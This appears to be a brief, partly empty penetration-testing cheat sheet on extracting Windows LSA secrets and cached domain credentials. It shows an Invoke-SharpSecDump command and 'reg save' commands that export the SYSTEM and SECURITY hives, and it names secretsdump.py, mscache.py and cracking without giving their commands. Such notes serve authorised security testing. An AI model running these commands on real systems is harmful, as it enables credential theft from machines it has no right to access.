LSA

Local Security Authority

SharpSecDump

Decrypt LSA secrets on target:

PS > Invoke-SharpSecDump -C "-target=127.0.0.1"

LsaStorePrivateData (ksetup)

MSCash2/MSCache2 (DCC2)

Domain cached credentials are stored within LSA secrets in HKLM:\SECURITY registry hive:

Cmd > reg save hklm\system system.hive
Cmd > reg save hklm\security security.hive

secretsdump.py

Export registry hives and extract cached creds locally with secretsdump.py:

mscache.py

Export registry hives and extract cached creds locally with mscache.py:

Crack

Last updated